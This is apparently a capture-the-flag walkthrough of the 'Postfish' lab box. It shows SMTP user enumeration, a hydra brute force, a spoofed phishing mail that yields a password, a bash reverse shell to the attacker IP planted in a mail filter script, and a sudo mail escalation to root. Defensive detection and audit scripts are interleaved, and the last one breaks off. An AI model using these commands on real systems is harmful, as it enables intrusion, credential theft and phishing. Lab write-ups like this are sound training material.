Postfish
Exploitation guide for Postfish | Proving Grounds
We will get the initial foothold by spear-phishing, which will give us credentials to SSH in. Then we will exploit insecure functionality and a sudo misconfiguration to gain root privileges.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES SASL(PLAIN) AUTH-RESP-CODE STLS PIPELINING CAPA TOP USER
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities ENABLE STARTTLS IDLE more post-login ID have listed Pre-login LOGIN-REFERRALS LITERAL+ AUTH=PLAINA0001 OK IMAP4rev1 SASL-IR
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: capabilities ENABLE Pre-login IDLE post-login ID more listed have LOGIN-REFERRALS LITERAL+ AUTH=PLAINA0001 OK IMAP4rev1 SASL-IR
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE UIDL TOP PIPELINING RESP-CODES CAPA USER SASL(PLAIN)
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after: 2031-01-24T10:26:37
We need to change our /etc/hosts to access this site. Add the following line to your /etc/hosts:
192.168.69.137 postfish.off
The web site doesn't have much functionality that we can leverage to gain RCE, but the team section lists 4 employees and their departments, so we will keep a note of this information for now.
Claire madison - hr
mike ross - it
brian moore - sales
sarah lorem - legal
First we will enumerate the departments and see whether all of them exist as mailboxes.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ smtp-user-enum -M VRFY -U "department.txt" -t $ip -p 25
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... department.txt
Target count ............. 1
Username count ........... 5
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Fri Aug 27 10:43:46 2021 #########
192.168.69.137: sales exists
192.168.69.137: hr exists
192.168.69.137: legal exists
192.168.69.137: it exists
######## Scan completed at Fri Aug 27 10:43:47 2021 #########
4 results.
5 queries in 1 seconds (5.0 queries / sec)
OK, great. All of them exist. Now let's enumerate the users of those departments. We will generate a wordlist following the general naming conventions companies use, using this great tool, usernamer.py.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ ~/oscp/tools/usernamer.py -f employeeusername.txt -l > smtp_usernames.txt
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ wc smtp_usernames.txt
395 395 2842 smtp_usernames.txt
Now that we have a wordlist of usernames, let's enumerate SMTP again.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ smtp-user-enum -M VRFY -U "../loot/smtp_usernames.txt" -t $ip -p 25
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... ../loot/smtp_usernames.txt
Target count ............. 1
Username count ........... 395
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Fri Aug 27 08:44:32 2021 #########
192.168.69.137: claire.madison exists
192.168.69.137: mike.ross exists
192.168.69.137: brian.moore exists
192.168.69.137: sarah.lorem exists
######## Scan completed at Fri Aug 27 08:45:50 2021 #########
4 results.
395 queries in 78 seconds (5.1 queries / sec)
Now we have a bunch of valid usernames and departments, as well as their email addresses.
# User-email
claire.madison@postfish.off
mike.ross@postfish.off
brian.moore@postfish.off
sarah.lorem@postfish.off
# department - email
it@postfish.off
sales@postfish.off
legal@postfish.off
hr@postfish.off
But all of this information is useless right now, since we don't have access to send or check mail yet. So we will brute-force IMAP with hydra. We will use the following wordlist for usernames, and for passwords we will generate a wordlist with the help of cewl.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ cat knownusernames.txt
hr
mail
root
sales
it
legal
claire.madison
mike.ross
brian.moore
sarah.lorem
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/scans]
└─$ cewl -d 5 -m 3 http://postfish.off/team.html -w ../loot/password.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ wc password.txt
116 116 776 password.txt
Brute-force with Hydra; after some time we will get a valid credential.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ hydra -L ./knownusernames.txt -P ./password.txt -f $ip imap -V -I
. . .
[143][imap] host: 192.168.69.137 login: sales password: sales
. . .
Note: Instead of brute-forcing first, which often takes a lot of time, try common passwords manually to save yourself some time.
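From the defender's side, the hydra run above leaves a very recognisable trail in Dovecot's log: a burst of "auth failed" disconnects from one client, cycling through usernames, followed by a successful Login for the account whose password was guessed. The detector below is an added example and not part of the original write-up; the log lines are constructed in Dovecot's imap-login format (the attacker address 192.168.49.69 and the usernames are the ones used in this guide), and the year is passed in because syslog timestamps lack one.

```python
"""Sliding-window brute-force detection over Dovecot imap-login / pop3-login lines.
Added example, not part of the original write-up; sample log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

# Dovecot logs a failed login as
#   imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<x>, method=PLAIN, rip=A, lip=B, ...
# and a successful one as
#   imap-login: Login: user=<x>, method=PLAIN, rip=A, lip=B, mpid=N, ...
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ dovecot: (?:imap|pop3)-login: "
    r"(?P<event>Login|Disconnected \(auth failed, \d+ attempts in \d+ secs\)): "
    r"user=<(?P<user>[^>]*)>, method=(?P<method>\S+), rip=(?P<rip>[0-9a-fA-F.:]+)"
)

def parse_line(line: str, year: int = 2021) -> Optional[Dict]:
    """Return {ts, ok, user, rip} for a login/failure line, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["event"] == "Login", "user": m["user"], "rip": m["rip"]}

def detect_bruteforce(lines: List[str], window: int = 60, threshold: int = 10, year: int = 2021) -> List[Dict]:
    """Count failed logins per client IP inside a sliding window of `window` seconds.
    Emits one 'bruteforce' alert when a client reaches `threshold` failures, and a
    'success_after_failures' alert when that client then logs in: the moment a
    guessed password worked and the account should be treated as compromised."""
    failures: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    flagged = set()
    alerts: List[Dict] = []
    for line in lines:
        ev = parse_line(line, year)
        if ev is None:
            continue
        q = failures[ev["rip"]]
        while q and (ev["ts"] - q[0][0]).total_seconds() > window:
            q.popleft()                      # expire failures that fell out of the window
        if ev["ok"]:
            if q:
                alerts.append({"type": "success_after_failures", "rip": ev["rip"], "user": ev["user"],
                               "failures": len(q), "users_tried": sorted({u for _, u in q}), "at": ev["ts"]})
            continue
        q.append((ev["ts"], ev["user"]))
        if len(q) >= threshold and ev["rip"] not in flagged:
            flagged.add(ev["rip"])           # one alert per client per run, not one per extra failure
            alerts.append({"type": "bruteforce", "rip": ev["rip"], "failures": len(q),
                           "users_tried": sorted({u for _, u in q}), "first": q[0][0], "last": ev["ts"]})
    return alerts

# Constructed sample: nine failures from one host in nine seconds cycling through
# the username list, one unrelated failure from another host, then the guessed login.
SAMPLE_LOG = """\
Aug 27 10:51:00 postfish dovecot: master: Dovecot v2.3.7.2 starting up for imap, pop3
Aug 27 10:51:01 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<hr>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c01>
Aug 27 10:51:02 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<hr>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c02>
Aug 27 10:51:03 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mail>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c03>
Aug 27 10:51:04 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mail>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c04>
Aug 27 10:51:05 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c05>
Aug 27 10:51:06 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<root>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c06>
Aug 27 10:51:07 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<sales>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c07>
Aug 27 10:51:08 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<sales>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c08>
Aug 27 10:51:09 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<it>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, session=<c09>
Aug 27 10:51:20 postfish dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mike.ross>, method=PLAIN, rip=10.0.0.5, lip=192.168.69.137, session=<c10>
Aug 27 10:51:25 postfish dovecot: imap-login: Login: user=<sales>, method=PLAIN, rip=192.168.49.69, lip=192.168.69.137, mpid=4021, session=<c11>
"""

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines(), window=60, threshold=8):
        print(alert)
```

The threshold and window are tuning knobs: hydra at its default parallelism generates far more than eight failures a minute, while a user mistyping a password does not, so the single failure from 10.0.0.5 in the sample never trips the rule.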
Since we now have a valid credential, we will try to check the mail.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nv $ip 110
(UNKNOWN) [192.168.69.137] 110 (pop3) open
+OK Dovecot (Ubuntu) ready.
user sales
+OK
pass sales
+OK Logged in.
list
+OK 1 messages:
1 683
.
retr 1
+OK 683 octets
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
by postfish.off (Postfix) with SMTP id 7712145434
for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off
Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,
IT
.
There is one mail sent to the sales department. They are supposed to get a link to reset their password. To exploit this, we will start a netcat listener and send them a mail which contains our IP.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: sales@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
hi claire,
Password reset link: http://192.168.49.69
regards,
.
250 2.0.0 Ok: queued as 26C744543F
quit
221 2.0.0 Bye
We get nothing in response when we send it to sales, so we will instead send it to brian.moore of the sales department.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: brian.moore@postfish.off,claire.madison@postfish.off,mike.ross@postfish.off,sarah.lorem@postfish.off
501 5.1.3 Bad recipient address syntax
rcpt to: brian.moore@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: Reset password
Hi Brian,
http://192.168.49.69
regards,
.
250 2.0.0 Ok: queued as 421EF4543F
quit
221 2.0.0 Bye
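Two Postfix settings explain both the VRFY enumeration earlier in the guide and the exchange just shown, where an outside client hands in mail with a forged it@postfish.off sender and Postfix queues it. The checker below is an added example, not part of the original write-up or of Postfix itself: it parses a main.cf and reports the two weaknesses, with a constructed weak configuration beside a constructed hardened one (the check_sender_access map path is an assumption; any equivalent sender control would do).

```python
"""Audit a Postfix main.cf for VRFY being enabled and for the absence of any
sender restriction.  Added example; not part of the original write-up or of Postfix."""
from typing import Dict, List

def parse_main_cf(text: str) -> Dict[str, str]:
    """main.cf is 'name = value' per line; '#' starts a comment; a line that
    begins with whitespace continues the previous value; a later assignment
    overrides an earlier one."""
    settings: Dict[str, str] = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t":
            if current is not None:
                settings[current] = f"{settings[current]} {raw.strip()}".strip()
            continue
        name, sep, value = raw.partition("=")
        if not sep:
            continue
        current = name.strip()
        settings[current] = value.strip()
    return settings

TRUE_VALUES = {"yes", "true", "on", "1"}   # spellings Postfix accepts for a true boolean

# Restrictions that can stop an unauthenticated client from using an internal sender
# address.  Their presence is a heuristic: the access map or login maps behind them
# still need to be reviewed by hand.
SENDER_CONTROLS = ("check_sender_access", "reject_sender_login_mismatch",
                   "reject_unauthenticated_sender_login_mismatch")

def audit_smtpd(settings: Dict[str, str]) -> List[str]:
    findings: List[str] = []
    vrfy = settings.get("disable_vrfy_command", "no").lower()      # Postfix default is "no"
    if vrfy not in TRUE_VALUES:
        findings.append(f"disable_vrfy_command = {vrfy}: VRFY answers differently for existing "
                        "and unknown local users, so accounts can be enumerated; set it to yes")
    sender = settings.get("smtpd_sender_restrictions", "")
    if not any(ctrl in sender for ctrl in SENDER_CONTROLS):
        findings.append("smtpd_sender_restrictions has no sender check: any client can deliver to "
                        "local users with a forged internal sender address; add check_sender_access "
                        "for the local domain (or a sender-login mismatch reject)")
    return findings

# Constructed samples, not the box's real configuration.
WEAK_MAIN_CF = """\
myhostname = postfish.off
mydestination = $myhostname, localhost
smtpd_recipient_restrictions = permit_mynetworks,
    reject_unauth_destination
"""

HARDENED_MAIN_CF = WEAK_MAIN_CF + """\
disable_vrfy_command = yes
smtpd_sender_restrictions = permit_mynetworks, permit_sasl_authenticated,
    check_sender_access hash:/etc/postfix/sender_access
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_MAIN_CF), ("hardened", HARDENED_MAIN_CF)):
        findings = audit_smtpd(parse_main_cf(text))
        print(f"{label}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

With VRFY disabled the server returns the same 252-style non-answer for every address, so smtp-user-enum's VRFY mode can no longer tell hr from a name that does not exist; the sender restriction makes Postfix reject the forged envelope sender before the DATA phase instead of queueing it.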
After some time we will get an HTTP request containing brian.moore's credentials.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.69] from (UNKNOWN) [192.168.69.137] 45160
POST / HTTP/1.1
Host: 192.168.49.69
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confirm_password%3DEternaLSunshinE
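On the receiving side, the forged mail is distinguishable from the real IT reminder read out of the sales mailbox earlier: Postfix records the submitting client in the first Received header, and for the phish that client is the attacker's host rather than localhost or the mail server's own network. The following check is an added example and not part of the original write-up; the trusted networks are an assumption, the legitimate message is the one retrieved over POP3 above, and the forged and external messages are constructed.

```python
"""Flag messages whose From: claims the internal domain but whose first hop
is an untrusted client.  Added example, not part of the original write-up."""
import email
import email.policy
import ipaddress
import re
from email.utils import parseaddr
from typing import Dict

INTERNAL_DOMAIN = "postfish.off"
TRUSTED_NETS = [ipaddress.ip_network("127.0.0.0/8"),      # local submissions and the content filter
                ipaddress.ip_network("192.168.69.0/24")]  # assumption: the mail server's own subnet

# The Received header Postfix adds reads "from HELO (REVERSE-DNS [IP]) by ...".
RECEIVED_FROM_RE = re.compile(r"^from\s+\S+\s+\([^)\[]*\[(?P<ip>[0-9a-fA-F.:]+)\]", re.IGNORECASE)

def first_hop(msg):
    """Received headers are prepended, so the last one is the first hop.
    Returns ("local", None), ("client", ip) or (None, None)."""
    received = msg.get_all("Received") or []
    if not received:
        return None, None
    hop = " ".join(str(received[-1]).split())     # unfold and normalise whitespace
    if hop.startswith("by ") and "from userid" in hop:
        return "local", None                        # submitted on the box via sendmail(1)
    m = RECEIVED_FROM_RE.match(hop)
    if m:
        try:
            return "client", ipaddress.ip_address(m["ip"])
        except ValueError:
            pass
    return None, None

def check_sender(raw: str) -> Dict[str, str]:
    msg = email.message_from_string(raw, policy=email.policy.default)
    _, addr = parseaddr(str(msg.get("From", "")))
    domain = addr.rpartition("@")[2].lower()
    kind, ip = first_hop(msg)
    if domain != INTERNAL_DOMAIN:
        verdict = "external"     # does not claim to be us; out of scope for this check
    elif kind == "local" or (kind == "client" and any(ip in net for net in TRUSTED_NETS)):
        verdict = "ok"
    elif kind == "client":
        verdict = "spoofed"      # internal address, but injected from an untrusted client
    else:
        verdict = "unknown"      # no parseable Received header; needs a human look
    return {"from": addr, "first_hop": str(ip) if ip is not None else (kind or "none"), "verdict": verdict}

# The IT reminder as read from the sales mailbox (page content).
LEGIT_INTERNAL = """\
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
    id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
    by postfish.off (Postfix) with SMTP id 7712145434
    for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off

Hi Sales team,
We will be sending out password reset links in the upcoming week.
"""

# Constructed: what the forged message above looks like once Postfix has stamped it.
FORGED_INTERNAL = """\
Received: from x (unknown [192.168.49.69])
    by postfish.off (Postfix) with SMTP id 0000000000
    for <brian.moore@postfish.off>; Fri, 27 Aug 2021 11:02:10 +0000 (UTC)
Subject: Reset password
From: it@postfish.off
To: brian.moore@postfish.off

Hi Brian, please follow the link to reset your password.
"""

# Constructed: ordinary mail from another domain, not claiming to be internal.
EXTERNAL = """\
Received: from mail.example.com (mail.example.com [203.0.113.10])
    by postfish.off (Postfix) with ESMTP id 0000000001
    for <hr@postfish.off>; Fri, 27 Aug 2021 11:05:00 +0000 (UTC)
From: vendor@example.com
To: hr@postfish.off
Subject: Invoice

Attached.
"""

if __name__ == "__main__":
    for name, raw in (("legit", LEGIT_INTERNAL), ("forged", FORGED_INTERNAL), ("external", EXTERNAL)):
        print(name, check_sender(raw))
```

The same logic fits a Dovecot sieve rule or a mail gateway policy, but the point for this box is simpler: the header evidence exists in the mailbox, and the "reset link" should never have been trusted without it.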
Now log in over SSH with the credential brian.moore:EternaLSunshinE and get the flag.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ ssh brian.moore@192.168.69.137
brian.moore@192.168.69.137's password:
brian.moore@postfish:~$ cat local.txt
7548d8c<REDACTED>730f3
From the result of linpeas we find that there is one file which is owned by root but which we have permission to write to.
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rwxrwx--- 1 root filter 1184 Aug 27 13:57 /etc/postfix/disclaimer
Check the content of the file.
brian.moore@postfish:~$ cat /etc/postfix/disclaimer
#!/bin/bash
# Localize these.
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail
####### Changed From Original Script #######
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses
####### Changed From Original Script END #######
# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
. . .
It's a bash script. Since we can write to it, we will put a bash reverse shell at the top.
brian.moore@postfish:~$ cat /etc/postfix/disclaimer
#!/bin/bash
# Localize these.
# change ip and port according to your need.
bash -i >& /dev/tcp/192.168.49.69/4444 0>&1
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail
####### Changed From Original Script #######
DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses
####### Changed From Original Script END #######
# Exit codes from <sysexits.h>
EX_TEMPFAIL=75
EX_UNAVAILABLE=69
. . .
We were able to put our reverse shell payload in, but we still need to figure out how this script gets executed. Check the article below, which gives us info about the script.
tl;dr: basically it's a script which gets executed whenever mail is received or sent.
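The root cause here is not the script's contents but its permissions: Postfix runs /etc/postfix/disclaimer on every delivery as the filter user, yet the file is group-writable (-rwxrwx--- root filter), so anyone in that group can change what runs. The audit below is an added example and not part of the original write-up or of Postfix: it reads the pipe(8) transports out of a master.cf, finds the program each one executes, and reports whether someone other than root can modify it. The master.cf text is constructed, and the way the disclaimer transport is wired in follows the usual pipe(8) layout, which is an assumption about this box.

```python
"""Find pipe(8) programs in master.cf and check who can modify them.
Added example; not part of the original write-up or of Postfix."""
import os
import stat
import tempfile
from typing import Dict, List, Optional, Tuple

def parse_pipe_transports(master_cf: str) -> List[Dict[str, Optional[str]]]:
    """master.cf rows have 8 fields (service type private unpriv chroot wakeup
    maxproc command+args); an indented line continues the previous row."""
    rows: List[str] = []
    for raw in master_cf.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and rows:
            rows[-1] += " " + raw.strip()
        else:
            rows.append(raw.strip())
    transports = []
    for row in rows:
        fields = row.split(None, 7)
        if len(fields) < 8:
            continue
        args = fields[7].split()
        if args[0] != "pipe":
            continue
        info: Dict[str, Optional[str]] = {"service": fields[0], "user": None, "argv0": None}
        for tok in args[1:]:
            if tok.startswith("user="):
                info["user"] = tok[len("user="):].split(":")[0]   # user=name or user=name:group
            elif tok.startswith("argv="):
                info["argv0"] = tok[len("argv="):]                 # the program Postfix executes
        transports.append(info)
    return transports

def modifiable_by_untrusted(path: str, trusted_uids: Tuple[int, ...] = (0,)) -> Optional[Dict]:
    """List the ways a file can be changed by someone other than a trusted uid."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    issues: List[str] = []
    if st.st_uid not in trusted_uids:
        issues.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP:
        issues.append(f"group-writable (gid {st.st_gid})")   # the disclaimer case: root:filter 0770
    if st.st_mode & stat.S_IWOTH:
        issues.append("world-writable")
    return {"path": path, "mode": oct(stat.S_IMODE(st.st_mode)), "issues": issues}

def audit_master_cf(master_cf: str, trusted_uids: Tuple[int, ...] = (0,)) -> List[Dict]:
    findings = []
    for t in parse_pipe_transports(master_cf):
        if not t["argv0"]:
            continue
        info = modifiable_by_untrusted(t["argv0"], trusted_uids)
        if info and info["issues"]:
            findings.append({**t, **info})
    return findings

def sample_master_cf(script_path: str) -> str:
    # Constructed master.cf: the stock smtp service plus a disclaimer filter
    # hooked in the way the Postfix disclaimer HOWTOs describe (assumption).
    return f"""\
# service type private unpriv chroot wakeup maxproc command + args
smtp      inet  n       -       y       -       -       smtpd
  -o content_filter=dfilt:
dfilt     unix  -       n       n       -       -       pipe
  flags=Rq user=filter argv={script_path} -f ${{sender}} -- ${{recipient}}
"""

def demo(trust_current_user: bool = False) -> Dict[str, List[Dict]]:
    """Create two copies of a filter script in a temp dir, one with the box's
    0770 mode and one with 0750, and audit a master.cf pointing at each."""
    trusted = (0, os.getuid()) if trust_current_user else (0,)
    d = tempfile.mkdtemp(prefix="postfix-audit-")
    results: Dict[str, List[Dict]] = {}
    for name, mode in (("weak", 0o770), ("safe", 0o750)):
        path = os.path.join(d, f"disclaimer-{name}")
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\nexit 0\n")
        os.chmod(path, mode)
        results[name] = audit_master_cf(sample_master_cf(path), trusted)
    return results

if __name__ == "__main__":
    for f in audit_master_cf(sample_master_cf("/etc/postfix/disclaimer")):
        print(f"{f['service']}: {f['path']} runs as {f['user']}, mode {f['mode']}: {', '.join(f['issues'])}")
```

Run against the real /etc/postfix/master.cf the main block reports the disclaimer script the way linpeas did, but tied to the transport and the user it runs as; the fix is the obvious one, root:root 0755, so the filter user can execute the script without being able to edit it.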
So we will again send mail to brian.moore. Start a netcat listener and send mail to trigger the script.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -v postfish.off 25
postfish.off [192.168.69.137] 25 (smtp) open
220 postfish.off ESMTP Postfix (Ubuntu)
mail from: it@postfish.off
250 2.1.0 Ok
rcpt to: brain.moore@postfish.off
550 5.1.1 <brain.moore@postfish.off>: Recipient address rejected: User unknown in local recipient table
rcpt to: brian.moore@postfish.off
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Testing mail.
Regards,
that one annoying IT guy.
.
250 2.0.0 Ok: queued as 2FF424543F
421 4.4.2 postfish.off Error: timeout exceeded
We will get a shell as filter.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/postfish/loot]
└─$ nc -nvlp 4444
listening on [any] 443 ...
connect to [192.168.49.69] from (UNKNOWN) [192.168.69.137] 56806
bash: cannot set terminal process group (35392): Inappropriate ioctl for device
bash: no job control in this shell
filter@postfish:/var/spool/postfix$ id
id
uid=997(filter) gid=997(filter) groups=997(filter)
filter@postfish:/var/spool/postfix$ whoami
whoami
filter
Check sudo privileges.
filter@postfish:/var/spool/postfix$ sudo -l
sudo -l
Matching Defaults entries for filter on postfish:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User filter may run the following commands on postfish:
(ALL) NOPASSWD: /usr/bin/mail *
We can run mail as sudo without a password. Just run sudo mail --exec='!/bin/bash' to escalate privileges to root.
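The sudo rule combines three properties that each deserve a flag in a review: NOPASSWD, a run-as of ALL, and a trailing wildcard that lets the caller pass any option to the program, so the program's own features (here mail's --exec) decide what actually runs. The parser below is an added example and not part of the original write-up; it reads a sudo -l listing such as the one above and reports those properties per rule. The hardened counter-example is constructed.

```python
"""Parse `sudo -l` output and flag NOPASSWD, run-as ALL and wildcard arguments.
Added example; not part of the original write-up."""
import re
from typing import Dict, List

# A rule line looks like "(ALL) NOPASSWD: /usr/bin/mail *" or "(root : root) SETENV: /bin/ls, /bin/cat".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output: str) -> List[Dict]:
    """Return the rules listed after the 'User X may run the following commands' line."""
    rules: List[Dict] = []
    in_rules = False
    for line in output.splitlines():
        s = line.strip()
        if s.startswith("User ") and "may run the following commands" in s:
            in_rules = True
            continue
        if not in_rules or not s:
            continue
        m = RULE_RE.match(s)
        if not m:
            continue
        tags = [t for t in (x.strip() for x in m["tags"].split(":")) if t]
        commands = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append({"runas": m["runas"].replace(" ", ""), "tags": tags, "commands": commands})
    return rules

def assess_rule(rule: Dict) -> List[str]:
    issues: List[str] = []
    if "NOPASSWD" in rule["tags"]:
        issues.append("NOPASSWD: no authentication at time of use")
    if rule["runas"].split(":")[0] == "ALL":
        issues.append("run-as ALL: may run as any user, including root")
    for cmd in rule["commands"]:
        if cmd == "ALL":
            issues.append("ALL: any command")
            continue
        prog, _, argspec = cmd.partition(" ")
        if any(ch in argspec for ch in "*?["):
            issues.append(f"{prog} {argspec}: wildcard arguments let the caller choose any option, "
                          "so the program's own features decide what runs")
    return issues

def audit_sudo_l(output: str) -> List[Dict]:
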